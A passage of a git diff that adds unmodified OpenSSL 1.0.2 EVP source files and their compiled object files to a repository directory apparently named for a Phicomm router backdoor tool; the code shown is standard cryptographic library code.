+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/rand.h>
+#ifndef OPENSSL_NO_RSA
+# include <openssl/rsa.h>
+#endif
+#include <openssl/evp.h>
+#include <openssl/objects.h>
+#include <openssl/x509.h>
+
+int EVP_PKEY_encrypt_old(unsigned char *ek, const unsigned char *key,
+                         int key_len, EVP_PKEY *pubk)
+{
+    int ret = 0;
+
+#ifndef OPENSSL_NO_RSA
+    if (pubk->type != EVP_PKEY_RSA) {
+#endif
+        EVPerr(EVP_F_EVP_PKEY_ENCRYPT_OLD, EVP_R_PUBLIC_KEY_NOT_RSA);
+#ifndef OPENSSL_NO_RSA
+        goto err;
+    }
+    ret =
+        RSA_public_encrypt(key_len, key, ek, pubk->pkey.rsa,
+                           RSA_PKCS1_PADDING);
+ err:
+#endif
+    return (ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p_enc.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p_enc.o
new file mode 100644
index 0000000000000000000000000000000000000000..7337b3d56089ae73e6e5b2c7175ae6e1ca35c33e
GIT binary patch
literal 1672
zcmbtU&ubG=5T5PUwrZ?V1cgf3lPKCpRtvU0NRqNitHFk}6%=LJq^ni)i_KeTJSgZX
zc<Ir9LhvXaG~h{3-t<q<qj*w;I`j6ubn~)abYOPA`QFT%*?DjGiBl?!83rgZ;0o+}
ziUn9P_i<LhEF6Ip{5U%M>)GN&cyhJ(bLIJ})%%=#P5GtX$8Quy>*Y5O5IJ_={_yq%
zqIVPc_=*a4|JHjbE-x=xXE&>1lZVzKyTmec_T^Bx_T!5gmYF{n(UdWcnnpc<TD-mq
zV*q{PRC^~7lNgUGVC<xgnbhReE;dB`X|V#3C+knAZ%<E2X4KF-jKlZ6(G{wdG$G<u
z7sFYm=z5qV&jcF8sF*N0N+M%Ia=)gS#&F6(bdSgS6z`1OEGo@Umw6<T_~Ku9XuE#1
z#%kc)D7)or&P{TIZkxNU`WCpw(po-Oa@Pulb!Wrf$mL6p3zhYp+YYPs`!y8|PNjkr
zcl{t}1=Q0LJy7UOQ>ef9B2i~Y{NWgHAtu3lAXGT?V4ZG*dsVbNi0rmPfnWC+_jfq3
zEsuM^s+|t7TC36Uo5(d=+-G>V<~rP~J(T{vX2{w>tL+E83ry_bZ@YH`ui+0${tvJ)
znQoPSBeKYmsPl`wC{|&zGpID1ENWbKX)q|6$iN}AR7c&UQ<6U;dHn`ImFv3EzkmxE
zKzsgczKyxGr|J`-5LN%YBBWLIm8E;5a6I&7+=*d5_A0K?S0~3ch<qiHHDDs3=BMZ?
z0@_p0|0DzS_tNw4U|iDq_2q`@oap>0SLG`{skSIBUvxoQ`gZ8wpyv~(pB?2d$oiY)
X#6)g4V2&Y5%Ksws>x0M$==pyD{F91n

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p_lib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p_lib.c
new file mode 100644
index 0000000..1171d30
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p_lib.c
@@ -0,0 +1,456 @@
+/* crypto/evp/p_lib.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/bn.h>
+#include <openssl/err.h>
+#include <openssl/objects.h>
+#include <openssl/evp.h>
+#include <openssl/asn1_mac.h>
+#include <openssl/x509.h>
+#ifndef OPENSSL_NO_RSA
+# include <openssl/rsa.h>
+#endif
+#ifndef OPENSSL_NO_DSA
+# include <openssl/dsa.h>
+#endif
+#ifndef OPENSSL_NO_DH
+# include <openssl/dh.h>
+#endif
+
+#ifndef OPENSSL_NO_ENGINE
+# include <openssl/engine.h>
+#endif
+
+#include "asn1_locl.h"
+
+static void EVP_PKEY_free_it(EVP_PKEY *x);
+
+int EVP_PKEY_bits(EVP_PKEY *pkey)
+{
+    if (pkey && pkey->ameth && pkey->ameth->pkey_bits)
+        return pkey->ameth->pkey_bits(pkey);
+    return 0;
+}
+
+int EVP_PKEY_size(EVP_PKEY *pkey)
+{
+    if (pkey && pkey->ameth && pkey->ameth->pkey_size)
+        return pkey->ameth->pkey_size(pkey);
+    return 0;
+}
+
+int EVP_PKEY_save_parameters(EVP_PKEY *pkey, int mode)
+{
+#ifndef OPENSSL_NO_DSA
+    if (pkey->type == EVP_PKEY_DSA) {
+        int ret = pkey->save_parameters;
+
+        if (mode >= 0)
+            pkey->save_parameters = mode;
+        return (ret);
+    }
+#endif
+#ifndef OPENSSL_NO_EC
+    if (pkey->type == EVP_PKEY_EC) {
+        int ret = pkey->save_parameters;
+
+        if (mode >= 0)
+            pkey->save_parameters = mode;
+        return (ret);
+    }
+#endif
+    return (0);
+}
+
+int EVP_PKEY_copy_parameters(EVP_PKEY *to, const EVP_PKEY *from)
+{
+    if (to->type != from->type) {
+        EVPerr(EVP_F_EVP_PKEY_COPY_PARAMETERS, EVP_R_DIFFERENT_KEY_TYPES);
+        goto err;
+    }
+
+    if (EVP_PKEY_missing_parameters(from)) {
+        EVPerr(EVP_F_EVP_PKEY_COPY_PARAMETERS, EVP_R_MISSING_PARAMETERS);
+        goto err;
+    }
+    if (from->ameth && from->ameth->param_copy)
+        return from->ameth->param_copy(to, from);
+ err:
+    return 0;
+}
+
+int EVP_PKEY_missing_parameters(const EVP_PKEY *pkey)
+{
+    if (pkey->ameth && pkey->ameth->param_missing)
+        return pkey->ameth->param_missing(pkey);
+    return 0;
+}
+
+int EVP_PKEY_cmp_parameters(const EVP_PKEY *a, const EVP_PKEY *b)
+{
+    if (a->type != b->type)
+        return -1;
+    if (a->ameth && a->ameth->param_cmp)
+        return a->ameth->param_cmp(a, b);
+    return -2;
+}
+
+int EVP_PKEY_cmp(const EVP_PKEY *a, const EVP_PKEY *b)
+{
+    if (a->type != b->type)
+        return -1;
+
+    if (a->ameth) {
+        int ret;
+        /* Compare parameters if the algorithm has them */
+        if (a->ameth->param_cmp) {
+            ret = a->ameth->param_cmp(a, b);
+            if (ret <= 0)
+                return ret;
+        }
+
+        if (a->ameth->pub_cmp)
+            return a->ameth->pub_cmp(a, b);
+    }
+
+    return -2;
+}
+
+EVP_PKEY *EVP_PKEY_new(void)
+{
+    EVP_PKEY *ret;
+
+    ret = (EVP_PKEY *)OPENSSL_malloc(sizeof(EVP_PKEY));
+    if (ret == NULL) {
+        EVPerr(EVP_F_EVP_PKEY_NEW, ERR_R_MALLOC_FAILURE);
+        return (NULL);
+    }
+    ret->type = EVP_PKEY_NONE;
+    ret->save_type = EVP_PKEY_NONE;
+    ret->references = 1;
+    ret->ameth = NULL;
+    ret->engine = NULL;
+    ret->pkey.ptr = NULL;
+    ret->attributes = NULL;
+    ret->save_parameters = 1;
+    return (ret);
+}
+
+/*
+ * Setup a public key ASN1 method and ENGINE from a NID or a string. If pkey
+ * is NULL just return 1 or 0 if the algorithm exists.
+ */
+
+static int pkey_set_type(EVP_PKEY *pkey, int type, const char *str, int len)
+{
+    const EVP_PKEY_ASN1_METHOD *ameth;
+    ENGINE *e = NULL;
+    if (pkey) {
+        if (pkey->pkey.ptr)
+            EVP_PKEY_free_it(pkey);
+        /*
+         * If key type matches and a method exists then this lookup has
+         * succeeded once so just indicate success.
+         */
+        if ((type == pkey->save_type) && pkey->ameth)
+            return 1;
+#ifndef OPENSSL_NO_ENGINE
+        /* If we have an ENGINE release it */
+        if (pkey->engine) {
+            ENGINE_finish(pkey->engine);
+            pkey->engine = NULL;
+        }
+#endif
+    }
+    if (str)
+        ameth = EVP_PKEY_asn1_find_str(&e, str, len);
+    else
+        ameth = EVP_PKEY_asn1_find(&e, type);
+#ifndef OPENSSL_NO_ENGINE
+    if (!pkey && e)
+        ENGINE_finish(e);
+#endif
+    if (!ameth) {
+        EVPerr(EVP_F_PKEY_SET_TYPE, EVP_R_UNSUPPORTED_ALGORITHM);
+        return 0;
+    }
+    if (pkey) {
+        pkey->ameth = ameth;
+        pkey->engine = e;
+
+        pkey->type = pkey->ameth->pkey_id;
+        pkey->save_type = type;
+    }
+    return 1;
+}
+
+int EVP_PKEY_set_type(EVP_PKEY *pkey, int type)
+{
+    return pkey_set_type(pkey, type, NULL, -1);
+}
+
+int EVP_PKEY_set_type_str(EVP_PKEY *pkey, const char *str, int len)
+{
+    return pkey_set_type(pkey, EVP_PKEY_NONE, str, len);
+}
+
+int EVP_PKEY_assign(EVP_PKEY *pkey, int type, void *key)
+{
+    if (!EVP_PKEY_set_type(pkey, type))
+        return 0;
+    pkey->pkey.ptr = key;
+    return (key != NULL);
+}
+
+void *EVP_PKEY_get0(EVP_PKEY *pkey)
+{
+    return pkey->pkey.ptr;
+}
+
+#ifndef OPENSSL_NO_RSA
+int EVP_PKEY_set1_RSA(EVP_PKEY *pkey, RSA *key)
+{
+    int ret = EVP_PKEY_assign_RSA(pkey, key);
+    if (ret)
+        RSA_up_ref(key);
+    return ret;
+}
+
+RSA *EVP_PKEY_get1_RSA(EVP_PKEY *pkey)
+{
+    if (pkey->type != EVP_PKEY_RSA) {
+        EVPerr(EVP_F_EVP_PKEY_GET1_RSA, EVP_R_EXPECTING_AN_RSA_KEY);
+        return NULL;
+    }
+    RSA_up_ref(pkey->pkey.rsa);
+    return pkey->pkey.rsa;
+}
+#endif
+
+#ifndef OPENSSL_NO_DSA
+int EVP_PKEY_set1_DSA(EVP_PKEY *pkey, DSA *key)
+{
+    int ret = EVP_PKEY_assign_DSA(pkey, key);
+    if (ret)
+        DSA_up_ref(key);
+    return ret;
+}
+
+DSA *EVP_PKEY_get1_DSA(EVP_PKEY *pkey)
+{
+    if (pkey->type != EVP_PKEY_DSA) {
+        EVPerr(EVP_F_EVP_PKEY_GET1_DSA, EVP_R_EXPECTING_A_DSA_KEY);
+        return NULL;
+    }
+    DSA_up_ref(pkey->pkey.dsa);
+    return pkey->pkey.dsa;
+}
+#endif
+
+#ifndef OPENSSL_NO_EC
+
+int EVP_PKEY_set1_EC_KEY(EVP_PKEY *pkey, EC_KEY *key)
+{
+    int ret = EVP_PKEY_assign_EC_KEY(pkey, key);
+    if (ret)
+        EC_KEY_up_ref(key);
+    return ret;
+}
+
+EC_KEY *EVP_PKEY_get1_EC_KEY(EVP_PKEY *pkey)
+{
+    if (pkey->type != EVP_PKEY_EC) {
+        EVPerr(EVP_F_EVP_PKEY_GET1_EC_KEY, EVP_R_EXPECTING_A_EC_KEY);
+        return NULL;
+    }
+    EC_KEY_up_ref(pkey->pkey.ec);
+    return pkey->pkey.ec;
+}
+#endif
+
+#ifndef OPENSSL_NO_DH
+
+int EVP_PKEY_set1_DH(EVP_PKEY *pkey, DH *key)
+{
+    int ret = EVP_PKEY_assign_DH(pkey, key);
+    if (ret)
+        DH_up_ref(key);
+    return ret;
+}
+
+DH *EVP_PKEY_get1_DH(EVP_PKEY *pkey)
+{
+    if (pkey->type != EVP_PKEY_DH && pkey->type != EVP_PKEY_DHX) {
+        EVPerr(EVP_F_EVP_PKEY_GET1_DH, EVP_R_EXPECTING_A_DH_KEY);
+        return NULL;
+    }
+    DH_up_ref(pkey->pkey.dh);
+    return pkey->pkey.dh;
+}
+#endif
+
+int EVP_PKEY_type(int type)
+{
+    int ret;
+    const EVP_PKEY_ASN1_METHOD *ameth;
+    ENGINE *e;
+    ameth = EVP_PKEY_asn1_find(&e, type);
+    if (ameth)
+        ret = ameth->pkey_id;
+    else
+        ret = NID_undef;
+#ifndef OPENSSL_NO_ENGINE
+    if (e)
+        ENGINE_finish(e);
+#endif
+    return ret;
+}
+
+int EVP_PKEY_id(const EVP_PKEY *pkey)
+{
+    return pkey->type;
+}
+
+int EVP_PKEY_base_id(const EVP_PKEY *pkey)
+{
+    return EVP_PKEY_type(pkey->type);
+}
+
+void EVP_PKEY_free(EVP_PKEY *x)
+{
+    int i;
+
+    if (x == NULL)
+        return;
+
+    i = CRYPTO_add(&x->references, -1, CRYPTO_LOCK_EVP_PKEY);
+#ifdef REF_PRINT
+    REF_PRINT("EVP_PKEY", x);
+#endif
+    if (i > 0)
+        return;
+#ifdef REF_CHECK
+    if (i < 0) {
+        fprintf(stderr, "EVP_PKEY_free, bad reference count\n");
+        abort();
+    }
+#endif
+    EVP_PKEY_free_it(x);
+    if (x->attributes)
+        sk_X509_ATTRIBUTE_pop_free(x->attributes, X509_ATTRIBUTE_free);
+    OPENSSL_free(x);
+}
+
+static void EVP_PKEY_free_it(EVP_PKEY *x)
+{
+    if (x->ameth && x->ameth->pkey_free) {
+        x->ameth->pkey_free(x);
+        x->pkey.ptr = NULL;
+    }
+#ifndef OPENSSL_NO_ENGINE
+    if (x->engine) {
+        ENGINE_finish(x->engine);
+        x->engine = NULL;
+    }
+#endif
+}
+
+static int unsup_alg(BIO *out, const EVP_PKEY *pkey, int indent,
+                     const char *kstr)
+{
+    BIO_indent(out, indent, 128);
+    BIO_printf(out, "%s algorithm \"%s\" unsupported\n",
+               kstr, OBJ_nid2ln(pkey->type));
+    return 1;
+}
+
+int EVP_PKEY_print_public(BIO *out, const EVP_PKEY *pkey,
+                          int indent, ASN1_PCTX *pctx)
+{
+    if (pkey->ameth && pkey->ameth->pub_print)
+        return pkey->ameth->pub_print(out, pkey, indent, pctx);
+
+    return unsup_alg(out, pkey, indent, "Public Key");
+}
+
+int EVP_PKEY_print_private(BIO *out, const EVP_PKEY *pkey,
+                           int indent, ASN1_PCTX *pctx)
+{
+    if (pkey->ameth && pkey->ameth->priv_print)
+        return pkey->ameth->priv_print(out, pkey, indent, pctx);
+
+    return unsup_alg(out, pkey, indent, "Private Key");
+}
+
+int EVP_PKEY_print_params(BIO *out, const EVP_PKEY *pkey,
+                          int indent, ASN1_PCTX *pctx)
+{
+    if (pkey->ameth && pkey->ameth->param_print)
+        return pkey->ameth->param_print(out, pkey, indent, pctx);
+    return unsup_alg(out, pkey, indent, "Parameters");
+}
+
+int EVP_PKEY_get_default_digest_nid(EVP_PKEY *pkey, int *pnid)
+{
+    if (!pkey->ameth || !pkey->ameth->pkey_ctrl)
+        return -2;
+    return pkey->ameth->pkey_ctrl(pkey, ASN1_PKEY_CTRL_DEFAULT_MD_NID,
+                                  0, pnid);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p_lib.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p_lib.o
new file mode 100644
index 0000000000000000000000000000000000000000..a18e87b93567edbb37f1ddedb9a8b34dc1811a30
GIT binary patch
literal 7440
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
HyHo$)tE+|5

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p_open.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p_open.c
new file mode 100644
index 0000000..229eb64
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p_open.c
@@ -0,0 +1,129 @@
+/* crypto/evp/p_open.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+
+#ifndef OPENSSL_NO_RSA
+
+# include <openssl/evp.h>
+# include <openssl/objects.h>
+# include <openssl/x509.h>
+# include <openssl/rsa.h>
+
+int EVP_OpenInit(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *type,
+                 const unsigned char *ek, int ekl, const unsigned char *iv,
+                 EVP_PKEY *priv)
+{
+    unsigned char *key = NULL;
+    int i, size = 0, ret = 0;
+
+    if (type) {
+        EVP_CIPHER_CTX_init(ctx);
+        if (!EVP_DecryptInit_ex(ctx, type, NULL, NULL, NULL))
+            return 0;
+    }
+
+    if (!priv)
+        return 1;
+
+    if (priv->type != EVP_PKEY_RSA) {
+        EVPerr(EVP_F_EVP_OPENINIT, EVP_R_PUBLIC_KEY_NOT_RSA);
+        goto err;
+    }
+
+    size = RSA_size(priv->pkey.rsa);
+    key = (unsigned char *)OPENSSL_malloc(size + 2);
+    if (key == NULL) {
+        /* ERROR */
+        EVPerr(EVP_F_EVP_OPENINIT, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    i = EVP_PKEY_decrypt_old(key, ek, ekl, priv);
+    if ((i <= 0) || !EVP_CIPHER_CTX_set_key_length(ctx, i)) {
+        /* ERROR */
+        goto err;
+    }
+    if (!EVP_DecryptInit_ex(ctx, NULL, NULL, key, iv))
+        goto err;
+
+    ret = 1;
